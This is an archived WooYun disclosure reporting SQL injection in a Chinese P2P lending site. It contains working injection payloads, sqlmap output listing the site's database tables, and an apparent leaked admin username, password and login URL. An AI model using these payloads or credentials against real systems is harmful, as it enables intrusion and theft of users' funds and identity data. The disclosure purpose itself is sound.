当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102306

漏洞标题:OK速贷多处高危漏洞可进后台资金数千万(泄漏用户资金、身份认证信息等)

相关厂商:okisbank.com

漏洞作者: 撸撸侠

提交时间:2015-03-30 15:23

修复时间:2015-05-14 17:30

公开时间:2015-05-14 17:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-30: 细节已通知厂商并且等待厂商处理中
2015-03-30: 厂商已经确认,细节仅向厂商公开
2015-04-09: 细节向核心白帽子及相关领域专家公开
2015-04-19: 细节向普通白帽子公开
2015-04-29: 细节向实习白帽子公开
2015-05-14: 细节向公众公开

简要描述:

OK速贷多处高危漏洞可进后台资金数千万(泄漏用户资金、身份认证信息等)

详细说明:

注入一:

GET /?plugins&q=areas&area_id=174 HTTP/1.1
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Accept-Encoding: gzip,deflate
Cache-Control: max-age=0
Host: www1.okisbank.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
DNT: 1
Connection: close
Cookie: PHPSESSID=ja1oli3mo1pdjfmpfi8qitrfv3; _jzqx=1.1426652708.1426652708.1.jzqsr=okisbank%2Ecom|jzqct=/user/login%2Ehtml.-; _jzqckmp=1; _ga=GA1.2.264870878.1426652708; _jzqa=1.1246666155320797000.1426652708.1426652708.1426735724.2; _jzqc=1; LXB_REFER=74.125.227.77; _jzqb=1.4.10.1426735724.1; Hm_lvt_0fed600eaace02a001f9ebf0a244f274=1426651774,1426654101,1426654412,1426736984; Hm_lpvt_0fed600eaace02a001f9ebf0a244f274=1426737794; dy_cookie_time=604800; 6ec6cef6a06f93620f0bd7d4d7d741d6=bab4m9R8As45YzkwT%2FjAdIivXGmOFOW8KgPRwOwCjy3WF373l%2BD1rX%2BO0gw
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3


注入二:
http://www1.okisbank.com/u/215'
注入三:
http://www1.okisbank.com/?user&q=code/borrow/loan&p=repay&type=tender&username=189
用户界面带搜索的地方几乎全有注射
例如:http://www1.okisbank.com/?user&q=code/borrow/tender&p=now&keywords=111%27&dotime1=2015-03-19&dotime2=2015-03-19

漏洞证明:

Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 AND 1731=1731
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 AND (SELECT 5321 FROM(SELECT COUNT(*),CONCAT(0x7163706271,(SELECT (CASE WHEN (5321=5321) THEN 1 ELSE 0 END)),0x7166796971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 UNION ALL SELECT NULL,CONCAT(0x7163706271,0x4f694676505649465261,0x7166796971),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 AND SLEEP(5)
---
[12:18:42] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
[12:18:42] [INFO] fetching tables for database: 'okisbank'
Database: okisbank
[134 tables]
+------------------------------------+
| deayou_account                     |
| deayou_account_balance             |
| deayou_account_bank                |
| deayou_account_cash                |
| deayou_account_fee                 |
| deayou_account_fee_type            |
| deayou_account_log                 |
| deayou_account_payment             |
| deayou_account_recharge            |
| deayou_account_users               |
| deayou_account_users_bank          |
| deayou_account_web                 |
| deayou_approve                     |
| deayou_approve_edu                 |
| deayou_approve_edu_id5             |
| deayou_approve_id5                 |
| deayou_approve_realname            |
| deayou_approve_sms                 |
| deayou_approve_smslog              |
| deayou_approve_video               |
| deayou_areas                       |
| deayou_articles                    |
| deayou_articles_pages              |
| deayou_articles_type               |
| deayou_attestations                |
| deayou_attestations_type           |
| deayou_attestations_user           |
| deayou_borrow                      |
| deayou_borrow_activity             |
| deayou_borrow_amount               |
| deayou_borrow_amount_apply         |
| deayou_borrow_amount_log           |
| deayou_borrow_amount_type          |
| deayou_borrow_auto                 |
| deayou_borrow_autolog              |
| deayou_borrow_care                 |
| deayou_borrow_change               |
| deayou_borrow_count                |
| deayou_borrow_count_log            |
| deayou_borrow_credit               |
| deayou_borrow_fee                  |
| deayou_borrow_fee_log              |
| deayou_borrow_fee_type             |
| deayou_borrow_flag                 |
| deayou_borrow_recover              |
| deayou_borrow_repay                |
| deayou_borrow_roam                 |
| deayou_borrow_style                |
| deayou_borrow_tender               |
| deayou_borrow_tender_auto          |
| deayou_borrow_tender_autolog       |
| deayou_borrow_tender_web           |
| deayou_borrow_type                 |
| deayou_borrow_verify               |
| deayou_borrow_vouch                |
| deayou_borrow_vouch_recover        |
| deayou_borrow_vouch_repay          |
| deayou_comment                     |
| deayou_comments                    |
| deayou_credit                      |
| deayou_credit_class                |
| deayou_credit_log                  |
| deayou_credit_rank                 |
| deayou_credit_type                 |
| deayou_dw_activity_review          |
| deayou_group                       |
| deayou_group_articles              |
| deayou_group_comments              |
| deayou_group_log                   |
| deayou_group_member                |
| deayou_group_type                  |
| deayou_linkages                    |
| deayou_linkages_class              |
| deayou_linkages_type               |
| deayou_links                       |
| deayou_links_type                  |
| deayou_luckmember_addcount_history |
| deayou_luckmember_award_address    |
| deayou_luckmember_award_history    |
| deayou_luckmember_count            |
| deayou_message                     |
| deayou_message_receive             |
| deayou_modules                     |
| deayou_rating_assets               |
| deayou_rating_company              |
| deayou_rating_contact              |
| deayou_rating_educations           |
| deayou_rating_finance              |
| deayou_rating_houses               |
| deayou_rating_info                 |
| deayou_rating_job                  |
| deayou_remind                      |
| deayou_remind_log                  |
| deayou_remind_type                 |
| deayou_remind_user                 |
| deayou_scrollpic                   |
| deayou_scrollpic_type              |
| deayou_site                        |
| deayou_site_menu                   |
| deayou_sms_type                    |
| deayou_spread_add                  |
| deayou_spread_log                  |
| deayou_spreads_log                 |
| deayou_spreads_set                 |
| deayou_spreads_users               |
| deayou_system                      |
| deayou_system_auto                 |
| deayou_system_type                 |
| deayou_ucenter                     |
| deayou_ucenter_set                 |
| deayou_users                       |
| deayou_users_admin                 |
| deayou_users_admin_type            |
| deayou_users_adminlog              |
| deayou_users_care                  |
| deayou_users_care_user             |
| deayou_users_email                 |
| deayou_users_email_log             |
| deayou_users_examines              |
| deayou_users_friends               |
| deayou_users_friends_invite        |
| deayou_users_friends_type          |
| deayou_users_info                  |
| deayou_users_log                   |
| deayou_users_qq                    |
| deayou_users_rebut                 |
| deayou_users_reglog                |
| deayou_users_sina                  |
| deayou_users_type                  |
| deayou_users_upfiles               |
| deayou_users_vip                   |
| deayou_users_viplog                |
| deayou_users_visit                 |
| deayou_weixin                      |
+------------------------------------+


注入出管理员账号:
ok速贷
ok123
http://www1.okisbank.com/?admin

屏幕快照 2015-03-19 下午12.50.42.png


屏幕快照 2015-03-19 下午12.51.31.png


屏幕快照 2015-03-19 下午12.51.52.png


mask 区域 
*****58f7a9.jpg" alt="1672_ap*****

修复方案:

版权声明:转载请注明来源 撸撸侠@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-03-30 17:28

厂商回复:

感谢提交漏洞的作者,我们一定做好网站漏洞修复与防御机制。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-03-19 12:58 | 李旭敏 ( 普通白帽子 | Rank:469 漏洞数:71 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    猪猪侠表哥来了···

  2. 2015-03-19 22:35 | 机器猫 ( 普通白帽子 | Rank:1141 漏洞数:253 | 爱生活、爱腾讯、爱网络!)

    猪猪侠表哥来了···

  3. 2015-03-21 09:55 | s3xy ( 核心白帽子 | Rank:832 漏洞数:113 | 相濡以沫,不如相忘于江湖)

    猪猪侠表哥来了···

  4. 2015-03-30 15:54 | greg.wu ( 普通白帽子 | Rank:815 漏洞数:99 | 打酱油的~)

    这是管管侠表哥吧 @管管侠

  5. 2015-04-30 08:23 | 大海捞针 ( 实习白帽子 | Rank:54 漏洞数:19 | 踏清风而来)

    身份证至少应该打码吧,乌云有点不厚道了。。。。